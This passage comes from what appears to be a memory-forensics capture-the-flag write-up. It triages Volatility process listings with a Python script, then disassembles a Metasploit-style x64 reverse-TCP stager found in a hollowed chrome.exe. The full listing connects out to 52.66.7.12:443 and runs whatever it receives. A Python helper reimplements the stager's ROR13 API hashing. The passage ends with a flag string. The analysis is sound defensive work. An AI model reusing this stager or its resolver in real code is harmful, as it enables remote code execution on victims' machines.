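    "userinit.exe": {"winlogon.exe"},
    "taskhostw.exe": {"svchost.exe"},
    "RuntimeBroker.": {"svchost.exe"},
    "explorer.exe": {"userinit.exe", "explorer.exe"},
}
# Children whose parent normally exits right after spawning them, so a
# missing parent is expected rather than suspicious.
TRANSIENT_PARENT_OK: Set[str] = {"csrss.exe", "wininit.exe", "winlogon.exe", "explorer.exe"}


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    threads: int
    exited: bool


def parse_pslist(text: str) -> List[Process]:
    """Parse vol3 windows.pslist text: skip the banner, split rows on tabs."""
    procs, in_table = [], False
    for line in text.splitlines():
        if line.startswith("PID\t"):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        f = line.split("\t")
        if len(f) < 10:
            continue
        procs.append(Process(pid=int(f[0]), ppid=int(f[1]), name=f[2],
                             threads=int(f[4]), exited=f[9] != "N/A"))
    return procs


def lineage_findings(procs: List[Process]) -> List[Tuple[int, str, str]]:
    """Return (pid, name, reason) for every lineage anomaly in the listing."""
    by_pid = {p.pid: p for p in procs}
    findings: List[Tuple[int, str, str]] = []
    for p in procs:
        if p.ppid == 0:  # System has no parent
            continue
        parent = by_pid.get(p.ppid)
        if parent is None:
            if p.name not in TRANSIENT_PARENT_OK:
                findings.append((p.pid, p.name, f"parent PID {p.ppid} not in the process list"))
            continue
        expected = EXPECTED_PARENT.get(p.name)
        if expected and parent.name not in expected:
            findings.append((p.pid, p.name,
                             f"unexpected parent {parent.name} (PID {parent.pid}), "
                             f"expected one of {sorted(expected)}"))
    return findings


if __name__ == "__main__":
    # Pipe real output in (vol.py -f image windows.pslist | python3 triage.py)
    # or run without stdin to triage the embedded sample.
    text = PSLIST_SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for pid, name, why in lineage_findings(parse_pslist(text)):
        print(f"{pid:>6}  {name:<15} {why}")
```

On the sample this reports the three processes whose parents are gone (chrome.exe 2764, MpCmdRun.exe 6140 and chrome.exe 1996) and nothing for csrss.exe or wininit.exe, whose session-0 smss.exe parent (PID 400) is expected to have exited. An orphan is a lead, not a verdict: the next step for each is the image base of its dump, its thread count and what the mapped image actually contains.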
The investigator then dumped the main executable of each candidate process with windows.pslist --dump, one PID at a time:
python3 vol.py -f ../THEEYRIE.dmp windows.pslist --pid {pid} --dump
where {pid} is the PID of one of:
[1] notepad.exe
[2] cmd.exe
[3] smartscreen.exe
[4] MpCmdRun.exe
[5] chrome.exe
When the dumped file was copied to the analysis host, Windows Defender flagged it immediately.
The file is not a PE image. There is no MZ header; its first byte is 0xFC (cld), followed by and rsp, -16 and a call over the next block, which is the standard prologue of a position-independent x64 shellcode of the Metasploit block_api family. In the IDA listing below, sub_0 is the API resolver: it walks PEB->Ldr->InMemoryOrderModuleList, hashes each module's BaseDllName with ROR13 (uppercased, as UTF-16, and including the terminator, because the loop count is BaseDllName.MaximumLength), hashes every exported name of that module the same way up to and including its NUL, and jumps to the export whose combined hash equals the value the caller placed in r10d. The hash constants annotated in the listing (0x0726774C = kernel32.dll!LoadLibraryA, 0x006B8029 = ws2_32.dll!WSAStartup, and so on) are reproduced by the hashing script at:
https://github.com/iagox86/nbtool/blob/master/samples/shellcode-win32/hash.py
seg000:0000000000000000 sub_0 proc near
seg000:0000000000000000
seg000:0000000000000000 var_38 = qword ptr -38h
seg000:0000000000000000
seg000:0000000000000000 cld
seg000:0000000000000001 and rsp, 0FFFFFFFFFFFFFFF0h
seg000:0000000000000005 call sub_D6
seg000:000000000000000A push r9
seg000:000000000000000C push r8
seg000:000000000000000E push rdx
seg000:000000000000000F push rcx
seg000:0000000000000010 push rsi
seg000:0000000000000011 xor rdx, rdx
seg000:0000000000000014 mov rdx, gs:[rdx+60h]
seg000:0000000000000019 mov rdx, [rdx+18h]
seg000:000000000000001D mov rdx, [rdx+20h]
seg000:0000000000000021
seg000:0000000000000021 loc_21: ; CODE XREF: sub_0+D1↓j
seg000:0000000000000021 mov rsi, [rdx+50h]
seg000:0000000000000025 movzx rcx, word ptr [rdx+4Ah]
seg000:000000000000002A xor r9, r9
seg000:000000000000002D
seg000:000000000000002D loc_2D: ; CODE XREF: sub_0+3E↓j
seg000:000000000000002D xor rax, rax
seg000:0000000000000030 lodsb
seg000:0000000000000031 cmp al, 61h ; 'a'
seg000:0000000000000033 jl short loc_37
seg000:0000000000000035 sub al, 20h ; ' '
seg000:0000000000000037
seg000:0000000000000037 loc_37: ; CODE XREF: sub_0+33↑j
seg000:0000000000000037 ror r9d, 0Dh
seg000:000000000000003B add r9d, eax
seg000:000000000000003E loop loc_2D
seg000:0000000000000040 push rdx
seg000:0000000000000041 push r9
seg000:0000000000000043 mov rdx, [rdx+20h]
seg000:0000000000000047 mov eax, [rdx+3Ch]
seg000:000000000000004A add rax, rdx
seg000:000000000000004D cmp word ptr [rax+18h], 20Bh
seg000:0000000000000053 jnz loc_CB
seg000:0000000000000059 mov eax, [rax+88h]
seg000:000000000000005F test rax, rax
seg000:0000000000000062 jz short loc_CB
seg000:0000000000000064 add rax, rdx
seg000:0000000000000067 push rax
seg000:0000000000000068 mov ecx, [rax+18h]
seg000:000000000000006B mov r8d, [rax+20h]
seg000:000000000000006F add r8, rdx
seg000:0000000000000072
seg000:0000000000000072 loc_72: ; CODE XREF: sub_0+98↓j
seg000:0000000000000072 jrcxz loc_CA
seg000:0000000000000074 dec rcx
seg000:0000000000000077 mov esi, [r8+rcx*4]
seg000:000000000000007B add rsi, rdx
seg000:000000000000007E xor r9, r9
seg000:0000000000000081
seg000:0000000000000081 loc_81: ; CODE XREF: sub_0+8E↓j
seg000:0000000000000081 xor rax, rax
seg000:0000000000000084 lodsb
seg000:0000000000000085 ror r9d, 0Dh
seg000:0000000000000089 add r9d, eax
seg000:000000000000008C cmp al, ah
seg000:000000000000008E jnz short loc_81
seg000:0000000000000090 add r9, [rsp+40h+var_38]
seg000:0000000000000095 cmp r9d, r10d
seg000:0000000000000098 jnz short loc_72
seg000:000000000000009A pop rax
seg000:000000000000009B mov r8d, [rax+24h]
seg000:000000000000009F add r8, rdx
seg000:00000000000000A2 mov cx, [r8+rcx*2]
seg000:00000000000000A7 mov r8d, [rax+1Ch]
seg000:00000000000000AB add r8, rdx
seg000:00000000000000AE mov eax, [r8+rcx*4]
seg000:00000000000000B2 add rax, rdx
seg000:00000000000000B5 pop r8
seg000:00000000000000B7 pop r8
seg000:00000000000000B9 pop rsi
seg000:00000000000000BA pop rcx
seg000:00000000000000BB pop rdx
seg000:00000000000000BC pop r8
seg000:00000000000000BE pop r9
seg000:00000000000000C0 pop r10
seg000:00000000000000C2 sub rsp, 20h
seg000:00000000000000C6 push r10
seg000:00000000000000C8 jmp rax
seg000:00000000000000CA ; ---------------------------------------------------------------------------
seg000:00000000000000CA
seg000:00000000000000CA loc_CA: ; CODE XREF: sub_0:loc_72↑j
seg000:00000000000000CA pop rax
seg000:00000000000000CB
seg000:00000000000000CB loc_CB: ; CODE XREF: sub_0+53↑j
seg000:00000000000000CB ; sub_0+62↑j
seg000:00000000000000CB pop r9
seg000:00000000000000CD pop rdx
seg000:00000000000000CE mov rdx, [rdx]
seg000:00000000000000D1 jmp loc_21
seg000:00000000000000D1 sub_0 endp
seg000:00000000000000D1
seg000:00000000000000D6
seg000:00000000000000D6 ; =============== S U B R O U T I N E =======================================
seg000:00000000000000D6
seg000:00000000000000D6
seg000:00000000000000D6 sub_D6 proc near ; CODE XREF: sub_0+5↑p
seg000:00000000000000D6 pop rbp
seg000:00000000000000D7 mov r14, '23_2sw'
seg000:00000000000000E1 push r14
seg000:00000000000000E3 mov r14, rsp
seg000:00000000000000E6 sub rsp, 1A0h
seg000:00000000000000ED mov r13, rsp
seg000:00000000000000F0 mov r12, 0C074234BB010002h
seg000:00000000000000FA push r12
seg000:00000000000000FC mov r12, rsp
seg000:00000000000000FF mov rcx, r14
seg000:0000000000000102 mov r10d, 726774Ch ; kernel32.dll!LoadLibraryA
seg000:0000000000000108 call rbp
seg000:000000000000010A mov rdx, r13
seg000:000000000000010D push 101h
seg000:0000000000000112 pop rcx
seg000:0000000000000113 mov r10d, 6B8029h ; ws2_32.dll!WSAStartup
seg000:0000000000000119 call rbp
seg000:000000000000011B push 0Ah
seg000:000000000000011D pop r14
seg000:000000000000011F
seg000:000000000000011F loc_11F: ; CODE XREF: sub_D6+108↓j
seg000:000000000000011F push rax
seg000:0000000000000120 push rax
seg000:0000000000000121 xor r9, r9
seg000:0000000000000124 xor r8, r8
seg000:0000000000000127 inc rax
seg000:000000000000012A mov rdx, rax
seg000:000000000000012D inc rax
seg000:0000000000000130 mov rcx, rax
seg000:0000000000000133 mov r10d, 0E0DF0FEAh ; ws2_32.dll!WSASocketA
seg000:0000000000000139 call rbp
seg000:000000000000013B mov rdi, rax
seg000:000000000000013E
seg000:000000000000013E loc_13E: ; CODE XREF: sub_D6+81↓j
seg000:000000000000013E push 10h
seg000:0000000000000140 pop r8
seg000:0000000000000142 mov rdx, r12
seg000:0000000000000145 mov rcx, rdi
seg000:0000000000000148 mov r10d, 6174A599h ; ws2_32.dll!connect
seg000:000000000000014E call rbp
seg000:0000000000000150 test eax, eax
seg000:0000000000000152 jz short loc_15E
seg000:0000000000000154 dec r14
seg000:0000000000000157 jnz short loc_13E
seg000:0000000000000159 call loc_1F1
seg000:000000000000015E
seg000:000000000000015E loc_15E: ; CODE XREF: sub_D6+7C↑j
seg000:000000000000015E sub rsp, 10h
seg000:0000000000000162 mov rdx, rsp
seg000:0000000000000165 xor r9, r9
seg000:0000000000000168 push 4
seg000:000000000000016A pop r8
seg000:000000000000016C mov rcx, rdi
seg000:000000000000016F mov r10d, 5FC8D902h ; ws2_32.dll!recv
seg000:0000000000000175 call rbp
seg000:0000000000000177 cmp eax, 0
seg000:000000000000017A jle short loc_1D1
seg000:000000000000017C add rsp, 20h
seg000:0000000000000180 pop rsi
seg000:0000000000000181 mov esi, esi
seg000:0000000000000183 push 40h ; '@'
seg000:0000000000000185 pop r9
seg000:0000000000000187 push 1000h
seg000:000000000000018C pop r8
seg000:000000000000018E mov rdx, rsi
seg000:0000000000000191 xor rcx, rcx
seg000:0000000000000194 mov r10d, 0E553A458h ; kernel32.dll!VirtualAlloc
seg000:000000000000019A call rbp
seg000:000000000000019C mov rbx, rax
seg000:000000000000019F mov r15, rax
seg000:00000000000001A2
seg000:00000000000001A2 loc_1A2: ; CODE XREF: sub_D6+116↓j
seg000:00000000000001A2 xor r9, r9
seg000:00000000000001A5 mov r8, rsi
seg000:00000000000001A8 mov rdx, rbx
seg000:00000000000001AB mov rcx, rdi
seg000:00000000000001AE mov r10d, 5FC8D902h ; ws2_32.dll!recv
seg000:00000000000001B4 call rbp
seg000:00000000000001B6 cmp eax, 0
seg000:00000000000001B9 jge short loc_1E3
seg000:00000000000001BB pop rax
seg000:00000000000001BC push r15
seg000:00000000000001BE pop rcx
seg000:00000000000001BF push 4000h
seg000:00000000000001C4 pop r8
seg000:00000000000001C6 push 0
seg000:00000000000001C8 pop rdx
seg000:00000000000001C9 mov r10d, 300F2F0Bh ; kernel32.dll!VirtualFree
seg000:00000000000001CF call rbp
seg000:00000000000001D1
seg000:00000000000001D1 loc_1D1: ; CODE XREF: sub_D6+A4↑j
seg000:00000000000001D1 push rdi
seg000:00000000000001D2 pop rcx
seg000:00000000000001D3 mov r10d, 614D6E75h ; ws2_32.dll!closesocket
seg000:00000000000001D9 call rbp
seg000:00000000000001DB dec r14
seg000:00000000000001DE jmp loc_11F
seg000:00000000000001E3 ; ---------------------------------------------------------------------------
seg000:00000000000001E3
seg000:00000000000001E3 loc_1E3: ; CODE XREF: sub_D6+E3↑j
seg000:00000000000001E3 add rbx, rax
seg000:00000000000001E6 sub rsi, rax
seg000:00000000000001E9 test rsi, rsi
seg000:00000000000001EC jnz short loc_1A2
seg000:00000000000001EE jmp r15
seg000:00000000000001EE sub_D6 endp ; sp-analysis failed
seg000:00000000000001EE
seg000:00000000000001F1 ; ---------------------------------------------------------------------------
seg000:00000000000001F1
seg000:00000000000001F1 loc_1F1: ; CODE XREF: sub_D6+83↑p
seg000:00000000000001F1 pop rax
seg000:00000000000001F2 push 0
seg000:00000000000001F4 pop rcx
seg000:00000000000001F5 mov r10, 56A2B5F0h ; kernel32.dll!ExitProcess
seg000:00000000000001FC call rbp
seg000:00000000000001FC ; ---------------------------------------------------------------------------
seg000:00000000000001FE dw 0
seg000:0000000000000200 db 28h ; (
seg000:0000000000000201 db 42h ; B
seg000:0000000000000202 align 8
seg000:0000000000000208 dq 4240FFFFFFFFh, 3000h, 2 dup(0)
seg000:0000000000000228 db 4Eh ; N
seg000:0000000000000229 db 42h ; B
seg000:000000000000022A align 10h
seg000:0000000000000230 db 5Eh ; ^
seg000:0000000000000231 db 42h, 6 dup(0)
seg000:0000000000000238 align 20h
seg000:0000000000000240 db 4Bh ; K
seg000:0000000000000241 db 45h ; E
seg000:0000000000000242 db 52h ; R
seg000:0000000000000243 aNel32Dll db 'NEL32.dll',0
seg000:000000000000024D align 2
seg000:000000000000024E db 58h ; X
seg000:000000000000024F db 4
seg000:0000000000000250 db 56h ; V
seg000:0000000000000251 aIrtualalloc db 'irtualAlloc',0
seg000:000000000000025D align 2
seg000:000000000000025E db 5
seg000:000000000000025F ; ---------------------------------------------------------------------------
seg000:000000000000025F add [rbp+78h], eax
seg000:0000000000000262 imul esi, [rax+rdx*2+'r'], 'seco'
seg000:0000000000000262 seg000 ends
The stager contains no string or other marker specific to this case, but its behaviour follows directly from the resolved calls and two immediates. sub_D6 pushes '23_2sw', which is the little-endian spelling of "ws2_32", and passes it to LoadLibraryA; it then calls WSAStartup and WSASocketA(AF_INET, SOCK_STREAM, ...). The immediate 0x0C074234BB010002 pushed at 0x0F0 sits in memory as the bytes 02 00 01 BB 34 42 07 0C, i.e. a sockaddr_in with sin_family = 2 (AF_INET), sin_port = 0x01BB (443, network byte order) and sin_addr = 52.66.7.12. connect() to that endpoint is attempted up to ten times (r14 = 0Ah), after which ExitProcess is called. On success the stager recv()s a 4-byte length, calls VirtualAlloc(NULL, len, MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40)), recv()s the second stage into that buffer in a loop, releases it with VirtualFree(MEM_RELEASE) if a recv fails, and otherwise jumps to it (jmp r15). In other words this is a staged reverse-TCP stager: the process running it opens an outbound connection from the victim to 52.66.7.12:443 and executes whatever the peer sends back. A natural follow-up on the image is windows.netscan, looking for a socket owned by PID 1996 to that endpoint.
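The resolver logic and the two configuration immediates discussed above, worked through in code as an added example (not code from the write-up or from the hash.py linked above). It reimplements the ROR13 hash exactly as sub_0 computes it, resolves the r10d constants from the listing back to names by hashing a candidate list, decodes the pushed sockaddr_in and module-name immediates, and checks whether a dumped file starts with the stager prologue rather than a PE header. The candidate API list is an assumption; a production resolver would hash every export of the DLLs in question.

```python
"""Static helpers for the x64 block_api stager in the listing (added example)."""
import struct
from typing import Dict, List, Optional, Tuple


def ror32(value: int, bits: int = 13) -> int:
    """32-bit rotate right, as `ror r9d, 0Dh` does in the resolver."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def block_api_hash(module: str, function: str) -> int:
    """Combined hash as sub_0 computes it: BaseDllName uppercased
    (sub al, 20h for bytes >= 'a'), walked as UTF-16LE for
    BaseDllName.MaximumLength bytes (so the NUL is included), plus the
    ASCII export name hashed up to and including its NUL (cmp al, ah)."""
    h_mod = 0
    for b in (module.upper() + "\x00").encode("utf-16-le"):
        h_mod = (ror32(h_mod) + b) & 0xFFFFFFFF
    h_fn = 0
    for b in (function + "\x00").encode("ascii"):
        h_fn = (ror32(h_fn) + b) & 0xFFFFFFFF
    return (h_mod + h_fn) & 0xFFFFFFFF


# Assumed candidate set: the exports a socket stager typically needs.
CANDIDATES: Dict[str, List[str]] = {
    "kernel32.dll": ["LoadLibraryA", "VirtualAlloc", "VirtualFree", "ExitProcess",
                     "ExitThread", "GetProcAddress", "CreateProcessA",
                     "WaitForSingleObject"],
    "ws2_32.dll": ["WSAStartup", "WSASocketA", "connect", "bind", "listen",
                   "accept", "recv", "send", "closesocket"],
}


def build_hash_table(candidates: Dict[str, List[str]] = CANDIDATES) -> Dict[int, str]:
    """Map hash -> 'module!function' for every candidate pair."""
    return {block_api_hash(m, f): f"{m}!{f}" for m, fns in candidates.items() for f in fns}


def resolve(r10d: int, table: Optional[Dict[int, str]] = None) -> str:
    table = build_hash_table() if table is None else table
    return table.get(r10d & 0xFFFFFFFF, "<unresolved>")


# r10d values in call order, copied from the listing.
CALLS_IN_LISTING = [0x0726774C, 0x006B8029, 0xE0DF0FEA, 0x6174A599, 0x5FC8D902,
                    0xE553A458, 0x5FC8D902, 0x300F2F0B, 0x614D6E75, 0x56A2B5F0]


def annotate_calls(hashes: List[int] = CALLS_IN_LISTING) -> List[str]:
    table = build_hash_table()
    return [resolve(h, table) for h in hashes]


def decode_sockaddr_in(imm: int) -> Tuple[str, int]:
    """`mov r12, imm / push r12` leaves the qword little-endian on the stack,
    where connect() reads it as the first 8 bytes of a sockaddr_in."""
    raw = struct.pack("<Q", imm)
    family = struct.unpack_from("<H", raw, 0)[0]
    if family != 2:  # AF_INET
        raise ValueError(f"not AF_INET: {family}")
    port = struct.unpack_from("!H", raw, 2)[0]  # sin_port is big-endian
    return ".".join(str(b) for b in raw[4:8]), port


def decode_pushed_string(ida_literal: bytes) -> str:
    """IDA prints a multi-character immediate most significant byte first;
    once pushed it is little-endian in memory, i.e. readable left to right."""
    value = int.from_bytes(ida_literal, "big")
    return value.to_bytes(8, "little").rstrip(b"\x00").decode("ascii")


# First three instructions assembled from the listing:
# cld ; and rsp, 0FFFFFFFFFFFFFFF0h ; call sub_D6 (E8 + rel32 = 0xD6 - 0x0A).
STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0e8cc000000")


def looks_like_x64_block_api_stub(blob: bytes) -> bool:
    """Quick triage: a dump that is raw stager rather than a PE image."""
    return not blob.startswith(b"MZ") and blob.startswith(STAGER_PROLOGUE[:6])


if __name__ == "__main__":
    for h, name in zip(CALLS_IN_LISTING, annotate_calls()):
        print(f"0x{h:08X}  {name}")
    ip, port = decode_sockaddr_in(0x0C074234BB010002)
    print(f"connect() target {ip}:{port}; LoadLibraryA({decode_pushed_string(b'23_2sw')!r})")
```

Masking after every add mirrors the 32-bit `add r9d, eax` in the resolver, so the function reproduces the hashes the shellcode actually compares against; hashing the candidate list is the same trick that produced the annotations in the listing, only in reverse.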
Results of the dumps:

| PID | Process name | Dump file | Result |
|---|---|---|---|
| 6152 | notepad.exe | pid.6152.0x7ff6ce630000.dmp | Normal application |
| 5804 | cmd.exe | pid.5804.0x7ff7d5b00000.dmp | Normal application |
| 4148 | smartscreen.exe | pid.4148.0x7ff7e5b40000.dmp | Normal application |
| 2764 | chrome.exe | Error outputting file | |
| 6140 | MpCmdRun.exe | Error outputting file | |
| 6240 | MpCmdRun.exe | pid.6240.0x7ff6df4d0000.dmp | Normal application |
| 1996 | chrome.exe | pid.1996.0x140000000.dmp | Suspicious |

Two details in this table are worth spelling out. The dump of chrome.exe 2764 fails because that process had already exited before acquisition (0 threads, ExitTime 15:12:07), so its address space is gone. The file name encodes the image base: every genuine image was mapped at an ASLR-randomised 0x7ff6.../0x7ff7... address, while the "chrome.exe" of PID 1996 sits at 0x140000000, the linker's default base for 64-bit executables. An image that was never relocated, in a live single-threaded process whose parent has vanished, is what a hollowed or otherwise replaced process looks like, and the contents of that dump, the stager disassembled above, confirm it.
Because the stager itself carries nothing that identifies the case, the investigator switched approach and searched the memory of PID 1996 for printable strings rather than its 0x262-byte image (with Volatility 3 one way is windows.memmap --pid 1996 --dump followed by strings on the resulting file).
That search produced the message 'Frog-FWGA142FS'.